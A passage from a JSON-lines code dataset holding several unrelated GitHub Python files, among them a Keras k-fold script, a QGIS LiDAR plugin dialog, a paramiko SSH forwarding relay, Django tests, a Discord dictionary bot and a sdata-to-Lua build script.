(\"2 2\" --> \"10 10\").\n\n\"\"\"\r\n\ndef replace_nums(string):\n newstring,num = \"\",\"\"\n for index,i in enumerate(string):\n if not i.isdigit():\n if num != \"\":\n newstring += bin(int(num))[2:]\n num = \"\"\n newstring += i\n else:num += i\n return newstring\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kfwTnnJjo3SKG2pYx_2.py","file_name":"kfwTnnJjo3SKG2pYx_2.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9514431246","text":"from keras.datasets import boston_housing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nprint(train_data.shape)\nprint(test_data.shape)\n\n# ...Scaler 사용해서 정규화\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nscaler = StandardScaler()\n# scaler = MinMaxScaler()\n\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\ntest_data = scaler.transform(test_data)\n\nfrom keras import models\nfrom keras import layers\n\ndef build_model():\n # 동일한 모델을 여러 번 생성할 것이므로 함수를 만들어 사용합니다.\n model = models.Sequential()\n model.add(layers.Dense(32, activation='relu', input_shape=(train_data.shape[1],)))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(1))\n model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])\n return model\n\nseed = 77\nfrom keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor\nfrom sklearn.model_selection import KFold, cross_val_score\nmodel = KerasRegressor(build_fn=build_model, epochs=10,\n batch_size=1, verbose=1)\nkfold = KFold(n_splits=5, shuffle=True, random_state=seed)\nresults = cross_val_score(model, train_data, train_targets, cv=kfold) # cv == cross Validation 교차검증\n\nimport numpy as np\nprint(results)\nprint(np.mean(results))\n\n# 1. 사이킷런의 KFold로 리파인 시킬 것\n# 2. 정규화 표준화 시킬 것\n# 3. np.mean(all_scores)를 1 이하로 낮출 것\n\n\n# from sklearn.model_selection import KFold\n# kf = KFold(n_splits=5)\n# for train_index, test_index in kf.split(train_data, train_targets):\n# partial_train_data, val_data = train_data[train_index], train_data[test_index]\n# partial_train_targets, val_targets = train_targets[train_index], train_targets[test_index]\n# print(train_index, test_index)\n\n","repo_name":"jamiedotpro/etc","sub_path":"keras/keras31_kfold.py","file_name":"keras31_kfold.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9785322318","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n/***************************************************************************\r\n LiDARForestryHeight\r\n A QGIS plugin. LiDAR Forestry Height\r\n generates a DEM with the forest height,\r\n calculated from a classified LiDAR point\r\n cloud using LasPy Library\r\n\r\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\r\n -------------------\r\n begin : 2018-09-24\r\n copyright : (C) 2019 by PANOimagen S.L.\r\n email : info@panoimagen.com\r\n git sha : $Format:%H$\r\n ***************************************************************************/\r\n\r\n/***************************************************************************\r\n * *\r\n * This program is free software; you can redistribute it and/or modify *\r\n * it under the terms of the GNU General Public License as published by *\r\n * the Free Software Foundation; either version 2 of the License, or *\r\n * (at your option) any later version. *\r\n * *\r\n ***************************************************************************/\r\n\"\"\"\r\nfrom __future__ import unicode_literals\r\nimport os\r\n\r\nfrom qgis.PyQt import uic\r\nfrom qgis.PyQt import QtWidgets\r\n\r\nimport logging\r\nlogger = logging.getLogger(\"lfh\")\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nfrom qgis.core import Qgis, QgsRasterLayer, QgsProject\r\nfrom qgis.gui import QgisInterface, QgsMessageBar\r\n\r\nfrom .lfh_errors import LasPyNotFoundError\r\n\r\ntry:\r\n from . import plugin_process\r\n LASPY_INSTALLED = True\r\nexcept LasPyNotFoundError as e:\r\n LASPY_INSTALLED = False\r\n \r\nfrom. import files_paths_funs as dir_fns\r\n\r\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\r\n os.path.dirname(__file__), 'LiDARForestryHeight_dialog_base.ui'))\r\n\r\n\r\nclass LiDARForestryHeightDialog(QtWidgets.QDialog, FORM_CLASS):\r\n def __init__(self, parent=None):\r\n \"\"\"Constructor.\"\"\"\r\n super(LiDARForestryHeightDialog, self).__init__(parent)\r\n # Set up the user interface from Designer.\r\n # After setupUI you can access any designer object by doing\r\n # self., and you can use autoconnect slots - see\r\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\r\n # #widgets-and-dialogs-with-auto-connect\r\n self.setupUi(self)\r\n self._initUi()\r\n self.iface = QgisInterface\r\n self.buttonBox.accepted.connect(self.accept)\r\n self.buttonBox.accepted.connect(self.preparingProcess)\r\n self.buttonBox.rejected.connect(self.reject)\r\n\r\n self.addResultsCheckBox.setChecked(True)\r\n self.createAndLoadIntermCheckBox.setChecked(False)\r\n\r\n self.outputFolderToolButton.clicked.connect(self.setOutPath)\r\n self.inputToolButton.clicked.connect(self.inputLiDAR)\r\n\r\n def _initUi(self):\r\n from . import version_number\r\n version = version_number.get_version_from_metadata()\r\n self.versionLabel.setText(u'Version: {}'.format(version))\r\n\r\n if LASPY_INSTALLED:\r\n text = u'LasPy Library avaible'\r\n color = u'color: black'\r\n else:\r\n text = (u'LasPy Library is not installed. Visit' +\r\n u' plugin homepage or LasPy documentation')\r\n color = u'color: red'\r\n\r\n self.lasPyInstalledLabel.setText(text)\r\n self.lasPyInstalledLabel.setStyleSheet(color)\r\n\r\n interpolate_methods = ['nearest', 'linear', 'cubic']\r\n self.interpolatingMethodComboBox.addItems(interpolate_methods)\r\n\r\n self.updateUi()\r\n\r\n def updateUi(self):\r\n \"\"\" Enable/disable UI options if LasPy Library is/isn't installed\r\n \"\"\"\r\n self.pluginGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.inputGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.resultsParamsGroupBox.setEnabled(LASPY_INSTALLED)\r\n\r\n def inputLiDAR(self):\r\n fileNames = QtWidgets.QFileDialog.getOpenFileNames(self,\r\n u\"Select the input LiDAR classified file/s\",\r\n self.inputLineEdit.text(),\r\n (\"LiDAR files (*.laz *.LAZ* *.las *.LAS);;\" +\r\n \" All files (*)\"))\r\n if fileNames:\r\n # quoted = ['\"{}\"'.format(fn) for fn in fileNames]\r\n self.inputLineEdit.setText(\", \".join(fileNames[0]))\r\n if not self.outputFolderLineEdit.text():\r\n try:\r\n outPath = os.path.join(\r\n os.path.split(os.path.abspath(fileNames[0][0]))[0],\r\n u'lidar_forestry_height_output')\r\n self.outputFolderLineEdit.setText(outPath)\r\n except IndexError:\r\n pass\r\n\r\n def setOutPath(self):\r\n \"\"\"Function to select the output folder and update the LineEdit\r\n \"\"\"\r\n outPath = QtWidgets.QFileDialog.getExistingDirectory(self,\r\n u\"Select the output folder\",\r\n self.outputFolderToolButton.text())\r\n if outPath:\r\n self.outputFolderLineEdit.setText(os.path.join(\r\n outPath, u'lidar_forestry_height_output'))\r\n\r\n def preparingProcess(self):\r\n\r\n if not LASPY_INSTALLED:\r\n self.showQMessage(u\"Error: LasPy Library is not installed!\" +\r\n u\"\\nPlease, solve it. More information\" +\r\n u\" at plugin homepage.\")\r\n return\r\n\r\n filenames = self.inputLineEdit.text()\r\n\r\n if not filenames:\r\n self.showQMessage(u\"Error: Not input file selected!\\nPlease,\" +\r\n u\" select one.\")\r\n\r\n outPath = self.outputFolderLineEdit.text()\r\n\r\n if not outPath:\r\n self.showQMessage(u\"Error: Not output folder selected!\\n\" +\r\n u\"Please, select one.\")\r\n\r\n if filenames and outPath:\r\n for f in filenames.split(\",\"):\r\n full_filename = f.strip()\r\n _, filename = os.path.split(full_filename)\r\n if outPath:\r\n self.settingProcessParams(full_filename, outPath)\r\n\r\n def settingProcessParams(self, full_filename, outPath):\r\n\r\n self.pixel_size = self.pixelSizeDoubleSpinBox.value()\r\n self.inter_method = self.interpolatingMethodComboBox.currentText()\r\n self.load_result = self.addResultsCheckBox.isChecked()\r\n self.partials_create_load = self.createAndLoadIntermCheckBox.isChecked()\r\n\r\n _, filename = os.path.split(full_filename)\r\n base_name, ext = os.path.splitext(filename)\r\n start_index = 1\r\n out_path = os.path.join(\r\n outPath, (base_name + '_r' + str(start_index)))\r\n\r\n if os.path.exists(out_path):\r\n import glob\r\n key_for_glob = os.path.join(outPath, (base_name + '_r*' ))\r\n dirs_list = glob.glob(key_for_glob)\r\n indexes = []\r\n for directory in dirs_list:\r\n try:\r\n fn_index = int(directory[-3:])\r\n except ValueError:\r\n try:\r\n fn_index = int(directory[-2:])\r\n except ValueError:\r\n fn_index = int(directory[-1])\r\n indexes.append(fn_index)\r\n max_index = max(indexes)\r\n next_index = max_index + 1\r\n out_path = os.path.join(outPath,\r\n (base_name + '_r' + str(next_index)))\r\n\r\n self.dir_fns = dir_fns.DirAndPaths(filename, out_path)\r\n\r\n self.showMessage(u'Starting processing LiDAR data {}'.format(base_name),\r\n Qgis.MessageLevel(0))\r\n\r\n try:\r\n self.process = plugin_process.Process(full_filename,\r\n out_path,\r\n self.pixel_size,\r\n self.inter_method,\r\n self.partials_create_load)\r\n\r\n except (ValueError, OSError) as message:\r\n self.showQMessage(str(message))\r\n self.showMessage('LiDAR Forestry Height stopped process',\r\n Qgis.MessageLevel(1))\r\n return\r\n\r\n if self.partials_create_load:\r\n self.load_raster_layer(self.process.dirs.out_paths['dtm'])\r\n self.load_raster_layer(self.process.dirs.out_paths['dsm'])\r\n\r\n if self.load_result:\r\n self.load_raster_layer(self.process.dirs.out_paths['height'])\r\n\r\n def load_raster_layer(self, raster_full_path):\r\n \"\"\"Add the result to canvas.\r\n \"\"\"\r\n raster_filename, _ = os.path.splitext(os.path.split(raster_full_path)[-1])\r\n rlayer = QgsRasterLayer(raster_full_path,\r\n raster_filename)\r\n QgsProject.instance().addMapLayer(rlayer)\r\n\r\n def showMessage(self, message, msg_level):\r\n \"\"\"This function shows a QGIS message bar when is called with the\r\n message and the message Level -i.e.:INFO-\r\n \"\"\"\r\n QgsMessageBar().pushMessage(\r\n message, level=msg_level)\r\n\r\n def showQMessage(self, message, msg_level = \"Error message\"):\r\n \"\"\"This function shows a Qt message dialog when is called with the\r\n message and the message Level-\r\n \"\"\"\r\n QtWidgets.QMessageBox.warning(self, msg_level, message)\r\n","repo_name":"PANOimagen/LiDARForestryHeight","sub_path":"LiDARForestryHeight_dialog.py","file_name":"LiDARForestryHeight_dialog.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"41455835479","text":"import os\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.lib.socket as s_socket\n\nfrom synapse.links.common import *\n\nparamiko = s_dyndeps.getDynMod('paramiko')\n\nclass SshRelay(LinkRelay):\n '''\n Implements the SSH link protocol for synapse.\n\n ssh://[user[:passwd]@][:port]/?forward=[&keyfile=]\n\n '''\n proto = 'ssh'\n\n def _reqValidLink(self):\n\n if paramiko is None:\n raise Exception('paramiko module not installed')\n\n if self.link[1].get('port') is None:\n self.link[1]['port'] = 22\n\n host = self.link[1].get('host')\n if host is None:\n raise s_common.PropNotFound('host')\n\n fwdstr = self.link[1].get('forward')\n if fwdstr is None:\n raise s_common.PropNotFound('forward=')\n\n keyfile = self.link[1].get('keyfile')\n if keyfile is not None and not os.path.isfile(keyfile):\n raise Exception('keyfile not found: %s' % (keyfile,))\n\n fwdhost, fwdport = fwdstr.split(':')\n try:\n fwdport = int(fwdport, 0)\n except ValueError as e:\n raise Exception('Bad Forward Port: %r' % (fwdport,))\n\n self.link[1]['fwdhost'] = fwdhost\n self.link[1]['fwdport'] = fwdport\n\n def _listen(self):\n raise Exception('Synapse Link: SSH Listen Not Supported (yet)')\n\n def _connect(self):\n\n host = self.link[1].get('host')\n user = self.link[1].get('user')\n port = self.link[1].get('port')\n passwd = self.link[1].get('passwd')\n keyfile = self.link[1].get('keyfile')\n timeout = self.link[1].get('timeout')\n\n try:\n\n ssh = paramiko.client.SSHClient()\n ssh.load_system_host_keys()\n\n ssh.connect(host, port=port, username=user, password=passwd, key_filename=keyfile, timeout=timeout, allow_agent=True)\n\n trns = ssh.get_transport()\n\n fwdhost = self.link[1].get('fwdhost')\n fwdport = self.link[1].get('fwdport')\n\n s = trns.open_channel('direct-tcpip', (fwdhost, fwdport), ('127.0.0.1', 0))\n\n return s_socket.Socket(s, ssh=ssh)\n\n except s_common.sockerrs as e:\n raiseSockError(self.link, e)\n\n except Exception as e:\n ssh.close()\n raise\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/links/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"34277393028","text":"from django.test import TestCase,Client\r\nimport packing\r\nimport json\r\n# from login import func\r\n\r\n# Create your tests here.\r\nclass func_testcase(TestCase):\r\n def setUp(self):\r\n packing.loaddata()\r\n self.appname = 'conf'\r\n self.tablename = 'ConfExaminationItem'\r\n self.c = Client()\r\n\r\n def test_func_impl_loadattrs(self):\r\n # packing.loaddata()\r\n\r\n c = self.c\r\n # appname = 'conf'\r\n # tablename = 'ConfExaminationItem'\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadattrs',data=data)\r\n\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadattrs',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadall(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadall',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadall',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'condition':json.dumps({\r\n 'id':1\r\n }),\r\n }\r\n response = c.post('/impl/loadfilter',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadfilter',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_cmpl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'tablelist':json.dumps(['conf.ConfExaminationItem', 'conf.ConfExaminationPlot']),\r\n 'condition':json.dumps({'id':2})\r\n }\r\n response = c.post('/cmpl/loadfilter',data=data)\r\n self.assertEqual(response.status_code, 200)\r\n # print ('test func cmpl loadfilter: ', str(response.content, encoding='utf-8'))\r\n\r\n def test_func_impl_loadone(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'itemid':1}\r\n response = c.post('/impl/loadone',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadone',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_saveobj(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'obj':json.dumps({\r\n 'item_name':'test_item_name',\r\n 'item_type':'工作考核',\r\n 'score_total':10000.0,\r\n 'score_default':0,\r\n 'score_top_limit':10000.0,\r\n 'score_bottom_limit':0,\r\n 'item_count_limit':0,\r\n }),\r\n }\r\n response = c.post('/impl/saveobj',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_saveobj',str(response.content,encoding='utf-8'))\r\n\r\n\r\n\r\n\r\nfrom login import func\r\nclass func_load_test(TestCase):\r\n def setUp(self):\r\n pass\r\n def test_func_impl_loadmodels(self):\r\n data = {\r\n 'appname':'conf',\r\n }\r\n\r\n res = func.loadtables(**data)\r\n self.assertListEqual(res, ['ConfExaminationItem', 'ConfExaminationPlot'])\r\n\r\n\r\n","repo_name":"MrLi008/py_django_implement","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2712750021","text":"#including required modules to the program\r\nimport os\r\nimport requests\r\nimport json\r\nimport discord\r\nimport datetime\r\n\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv()\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'{client.user.name} has connected to Discord!')\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(f'Hi {member.name}, welcome to my Discord server!')\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n\r\n msg = message.content\r\n\r\n if msg == '$help':\r\n embedv = discord.Embed(title='Dicti\\'s walkthrough', \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow())\r\n\r\n embedv.set_thumbnail(url = 'https://i.imgur.com/emVAdxH.jpg')\r\n\r\n embedv.add_field(name = '`$help`',\r\n value = 'Displays the list of commands supported by Dicti and the specific syntax need for the usage',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$dict `',\r\n value = 'Displays information on the word used involving parameters such as definitions, synonyms, phonetics, etc.',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$urban `',\r\n value = 'Displays information regarding the colloquial use of the word and the its different meanings under different contexts',\r\n inline = False)\r\n\r\n await message.channel.send(embed = embedv)\r\n\r\n # if msg.startswith('$urban'):\r\n # word = msg.split('$urban ', 1)[1]\r\n\r\n # response = requests.get(\"https://api.urbandictionary.com/v0/define?term=\" + word)\r\n # json_data = json.loads(response.text)\r\n\r\n # deflist = json_data['list']\r\n # n = len(deflist)\r\n\r\n # if n > 0:\r\n # deflist = sorted(deflist, key = lambda x: x['thumbs_up'], reverse = True)\r\n # n = min(5, n)\r\n\r\n # page = []\r\n\r\n\r\n\r\n\r\n\r\n \r\n # else:\r\n # noword = 'No meanings found'\r\n # await message.channel.send(noword)\r\n\r\n if msg.startswith('$dict'):\r\n word = msg.split('$dict ', 1)[1]\r\n\r\n response = requests.get(\"https://api.dictionaryapi.dev/api/v2/entries/en/\" + word)\r\n json_data = json.loads(response.text)\r\n\r\n if type(json_data) == list:\r\n n = len(json_data)\r\n\r\n page = []\r\n \r\n for i in range(n):\r\n embedv = discord.Embed(title = 'Dictionary ('+str(i+1)+'/'+str(n)+')', \r\n description = json_data[i]['word'].title(), \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow()) \r\n\r\n embedv.add_field(name = '\\u200b', \r\n value = '**Origin: **'+json_data[i]['origin'] +'\\n' + '**Parts of Speech: **'+json_data[i]['meanings'][0]['partOfSpeech'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n embedv.add_field(name = 'Phonetics',\r\n value = 'Text: '+json_data[i]['phonetics'][0]['text'] + '\\n' + 'Audio: '+json_data[i]['phonetics'][0]['audio'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n defs = json_data[i]['meanings'][0]['definitions']\r\n\r\n for j in range(len(defs)):\r\n x = len(defs[j]['synonyms'])\r\n y = len(defs[j]['antonyms'])\r\n\r\n if x > 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]) + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n elif x > 0 and y == 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]), \r\n inline = False) \r\n elif x == 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n else:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'], \r\n inline = False) \r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False) \r\n\r\n page.append(embedv)\r\n \r\n emb = await message.channel.send(embed = page[0])\r\n await emb.add_reaction(\"◀️\")\r\n await emb.add_reaction(\"▶️\")\r\n\r\n def check(reaction, user):\r\n return user == message.author\r\n\r\n k = 0 \r\n reaction = None\r\n\r\n while True:\r\n if str(reaction) == '◀️':\r\n if k > 0:\r\n k -= 1\r\n await emb.edit(embed = page[k])\r\n elif str(reaction) == '▶️':\r\n if k < n-1:\r\n k += 1\r\n await emb.edit(embed = page[k])\r\n\r\n try:\r\n reaction, user = await client.wait_for('reaction_add', timeout = 30.0, check = check)\r\n await emb.remove_reaction(reaction, user)\r\n except:\r\n break\r\n \r\n else:\r\n noword = json_data['title']\r\n await message.channel.send(noword)\r\n\r\nclient.run(TOKEN)","repo_name":"MistaAsh/Dicti-bot","sub_path":"dicti.py","file_name":"dicti.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"781394489","text":"from threading import Thread\r\nfrom random import choice\r\nimport time\r\n\r\nauthor = 'Jencent Dizon'\r\nlink = 'https://github.com/I-am-Programmer-101'\r\nprint(\"Author:\",author,\"\\nLink:\",link)\r\n\r\ndata = [90,81,78,95,79,72,85]\r\n\r\nclass MyThread(Thread):\r\n \r\n def __init__(self, val):\r\n # Costructor\r\n Thread.__init__(self)\r\n self.val = val\r\n \r\n \r\n def run(self):\r\n for i in range(1):\r\n time.sleep(2)\r\n print('Average Value:',choice(data),'in %s' % (self.getName()))\r\n print('Maximum Value:',choice(data),'in %s' % (self.getName()))\r\n print('Minimum Value:',choice(data),'in %s' % (self.getName()))\r\n\r\n \r\n \r\n# Run following code when the program starts\r\nif __name__ == '__main__':\r\n print('Thread Starting...')\r\n # Declare objects of MyThread class\r\n myThreadOb1 = MyThread(3)\r\n myThreadOb1.setName('Thread 1')\r\n \r\n myThreadOb2 = MyThread(3)\r\n myThreadOb2.setName('Thread 2')\r\n\r\n myThreadOb3 = MyThread(3)\r\n myThreadOb3.setName('Thread 3')\r\n \r\n # Start running the threads!\r\n myThreadOb1.start()\r\n myThreadOb2.start()\r\n myThreadOb3.start()\r\n\r\n # Wait for the threads to finish...\r\n myThreadOb1.join()\r\n myThreadOb2.join()\r\n myThreadOb3.join()\r\n\r\n print('Thread Terminating...')\r\n","repo_name":"jencent101/Threading","sub_path":"threading.py","file_name":"threading.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2307143748","text":"#User function Template for python3\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n'''\n\ndef reverseDLL(head):\n if not head or not head.next :\n return head\n prev = None\n cur = head\n while cur :\n tmp = cur.next\n cur.next = prev\n cur.prev = tmp\n prev = cur\n cur = tmp\n return prev\n\n\n\n# Driver code Starts\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, new_data,tail):\n if not self.head:\n self.head=Node(new_data)\n return self.head\n Nnode=Node(new_data)\n Nnode.prev=tail\n tail.next=Nnode\n return Nnode\n\n def printList(self, node):\n while(node is not None):\n print (node.data,end=' ')\n node = node.next\n\n\n\nif __name__ == '__main__':\n t=int(input())\n\n for tcs in range(t):\n n=int(input())\n arr=[int(x) for x in input().split()]\n\n\n dll=DoublyLinkedList()\n tail=None\n\n for e in arr:\n tail=dll.push(e,tail)\n\n resHead=reverseDLL(dll.head)\n dll.printList(resHead)\n print()\n\n# Driver Code Ends\n","repo_name":"VbhvGupta/workspace","sub_path":"GFG/ReverseDLL.py","file_name":"ReverseDLL.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24202807630","text":"# -*- coding: utf-8 -*-\r\nclass LanguageObject(object):\r\n \r\n lang= None\r\n langDefault = None\r\n def __init__(self):\r\n pass\r\n \r\n @classmethod\r\n def setLanguage(cls,lang):\r\n \r\n cls.lang = []\r\n cls.langDefault = {}\r\n for l in lang:\r\n language = Language(id_language_label= l.id_language_label,\r\n module= l.module,\r\n default_label= l.default_label,\r\n message_en= l.message_en,\r\n message_th= l.message_th\r\n )\r\n cls.lang.append( language)\r\n cls.langDefault[l.default_label] = language\r\n \r\n @classmethod\r\n def getLanguage(cls):\r\n return cls.lang\r\n \r\n @classmethod\r\n def getdata(cls,key,lang='EN'):\r\n if (cls.langDefault is not None and cls.langDefault[key] is not None) :\r\n if 'th'.upper() == lang.upper():\r\n return cls.langDefault[key].message_th\r\n else:\r\n return cls.langDefault[key].message_en\r\n return key\r\n \r\n\r\nclass Language(object):\r\n def __init__(self,id_language_label=None,module=None,default_label=None,message_en=None, message_th=None):\r\n self.id_language_label = id_language_label\r\n self.module = module\r\n self.default_label = default_label\r\n self.message_en = message_en\r\n self.message_th = message_th","repo_name":"tongpa/JMProject","sub_path":"PyPollModel/surveyobject/languageobject.py","file_name":"languageobject.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43077900185","text":"#-*-encoding:utf8-*-\n#!/bin/python\n\nimport os\nimport hashlib\nimport yaml\nimport zipfile\nimport time\nimport sys, getopt\n#import oss_util\nfrom jinja2 import *\nimport datetime\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nimport dbutil\nimport shutil\n\ndef tableToClass(fieldName):\n strs = fieldName.split('_')\n result = ''\n for str in strs:\n result = result + str.capitalize()\n return result\n\ndef columnNameToFieldName(columnName):\n strs = columnName.split('_')\n result = ''\n index = 1\n for str in strs:\n if index == 1:\n result = result + str[0].lower() + str[1:]\n else:\n result = result + str.capitalize()\n index = index + 1\n return result\n\nclass Loader( BaseLoader ):\n def __init__(self, parent):\n self.env = Environment( loader=FileSystemLoader(parent))\n self.env.template_class = Template\n self.env.globals['tableToClass'] = tableToClass\n self.env.globals['columnNameToFieldName'] = columnNameToFieldName\n\n'''\nsdata数据转换为lua\n'''\nclass sdatatolua:\n '''\n 构造函数\n '''\n def __init__(self, config):\n self.game = config['game']\n self.sdataZipPath = config['sdata_zip_path']\n self.sdataVersion = config['sdata_version']\n self.confFilePath = config['config_file_path']\n self.env = config['env']\n self.mode = config['mode']\n\n self.log(\"env:%s\", self.env)\n self.log(\"game:%s\", self.game)\n self.log(\"sdataZipPath:%s\", self.sdataZipPath)\n self.log(\"sdataVersion:%s\", self.sdataVersion)\n\n self.loadConfig()\n\n if self.mode == 'db':\n self.dbutil = dbutil.DBUtil(host=self.dbConf['host'], db=self.dbConf['db'], user=self.dbConf['user'], passwd=self.dbConf['password'])\n\n # oss客户端\n # self.oss = oss_util.oss_util(access_key_id=self.ossConf['access_key_id'],\n # access_key_secret=self.ossConf['access_key_secret'],\n # bucket_name=self.ossConf['bucket_name'],\n # endpoint=self.ossConf['endpoint'])\n '''\n 载入配置\n '''\n def loadConfig(self):\n filepath = os.path.join(self.confFilePath, \"sdata.yml\")\n f = open(filepath, 'rb')\n # self.conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n self.conf = yaml.load(f.read())\n f.close()\n\n sdataBaseDir=self.conf['output_dir']\n try:\n sdataBaseDir = sdataBaseDir%self.env\n except:\n pass\n\n self.sdataDir = os.path.join(sdataBaseDir, self.game)\n self.ossConf = self.conf['oss']\n self.tablesConf = self.conf['tables']\n self.dbConf = self.conf['db']\n\n '''\n 将Sdata转换为Lua\n '''\n def doSdataToLua(self):\n # 1. 检查工作空间\n self.doEnvCheck()\n\n # 2. 解压资源\n self.unzipSdataZip()\n\n # 3. 生成动更\n self.genSdataToLua()\n\n # 4. 清理\n self.doClean()\n\n\n '''\n 环境检查\n '''\n def doEnvCheck(self):\n if not os.path.exists(self.sdataDir):\n self.log(\"第一次生成SdataToLua,创建目录:%s\", self.sdataDir)\n os.makedirs(self.sdataDir)\n self.log(\"sdataDir:%s\", self.sdataDir)\n\n # 目标路径\n self.newVersionDir = os.path.join(self.sdataDir, self.sdataVersion)\n if not os.path.exists(self.newVersionDir):\n os.makedirs(self.newVersionDir)\n self.log(\"sdataVersionDir:%s\", self.newVersionDir)\n\n\n '''\n 解压资源zip\n '''\n def unzipSdataZip(self):\n if self.mode == 'db':\n return\n\n if not os.path.exists(self.sdataZipPath):\n self.log(\"资源文件不存在, path:%s\", self.sdataZipPath)\n sys.exit(2)\n return\n\n # 解压文件\n dynamicZipFile = zipfile.ZipFile(self.sdataZipPath, 'r')\n count = 0\n start = time.time()\n totalCount = dynamicZipFile.namelist().__len__()\n for file in dynamicZipFile.namelist():\n end = time.time()\n if end - start > 1:\n start = time.time()\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n count += 1\n if file.endswith(\".xml\"):\n self.sdataXmlFile = os.path.join(self.newVersionDir, file)\n\n dynamicZipFile.extract(file, self.newVersionDir)\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n\n dynamicZipFile.close()\n\n # 检查版本号\n version = 